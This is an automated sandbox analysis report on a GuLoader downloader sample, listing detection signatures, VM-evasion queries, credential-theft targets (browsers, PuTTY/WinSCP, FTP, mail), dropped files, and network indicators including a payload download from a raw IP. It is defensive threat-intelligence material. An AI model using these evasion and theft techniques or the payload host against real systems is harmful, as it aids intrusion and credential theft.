Windows Analysis Report
99200032052824.bat.exe

Overview

General Information

Sample name: 99200032052824.bat.exe
Analysis ID: 1447846
MD5: 085de7ac75bbd791c1b1f979fe8ff78c
SHA1: f33f25a99dbf0f7b9c2ad2bc886e7748cb5d888f
SHA256: f76bdeb70f9927c49aa87d92d92eb93d05317a3bde63da7a78a11033b29b41ab
Infos:

Detection

GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 99200032052824.bat.exe ReversingLabs: Detection: 13%
Source: 99200032052824.bat.exe Virustotal: Detection: 20% Perma Link
Machine Learning detection for sample
Source: 99200032052824.bat.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 99200032052824.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 99200032052824.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004062A3 FindFirstFileA,FindClose, 5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004026FE FindFirstFileA, 5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004026FE FindFirstFileA, 9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004062A3 FindFirstFileA,FindClose, 9_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: global traffic HTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: 99200032052824.bat.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard, 5_2_00405205
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040320C
Detected potential crypto function
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00404A44 5_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00406F54 5_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040677D 5_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 5_2_73A31A98
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00404A44 9_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00406F54 9_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0040677D 9_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00169028 9_2_00169028
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_001688BB 9_2_001688BB
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_001638F8 9_2_001638F8
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00164910 9_2_00164910
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016C360 9_2_0016C360
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016F6A0 9_2_0016F6A0
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00164040 9_2_00164040
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016E98A 9_2_0016E98A
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F7700 9_2_375F7700
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F8668 9_2_375F8668
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F2690 9_2_375F2690
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F1CA0 9_2_375F1CA0
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F3750 9_2_375F3750
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375FA880 9_2_375FA880
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016C648 9_2_0016C648
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: String function: 00402ACB appears 48 times
Sample file is different than original file name gathered from version info
Source: 99200032052824.bat.exe, 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301021306350.0000000006DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 99200032052824.bat.exe
Uses 32bit PE files
Source: 99200032052824.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@3/23@1/2
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004044D1 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 5_2_004044D1
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004020D1 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk, 5_2_004020D1
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Mutant created: NULL
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsxD41F.tmp Jump to behavior
Source: 99200032052824.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\99200032052824.bat.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 99200032052824.bat.exe ReversingLabs: Detection: 13%
Source: 99200032052824.bat.exe Virustotal: Detection: 20%
Source: C:\Users\user\Desktop\99200032052824.bat.exe File read: C:\Users\user\Desktop\99200032052824.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File written: C:\Users\user\AppData\Local\Temp\tmc.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: 99200032052824.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: 99200032052824.bat.exe PID: 8652, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 5_2_73A31A98
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A32F20 push eax; ret 5_2_73A32F4E
Drops PE files
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.Aar Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.syg Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\parallelopipedon.idi Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.nap Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djv Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.bra Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\afkontrollere.urb Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.ten Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.non Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpg Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txt Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.sol Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bog Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kal Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cem Jump to behavior
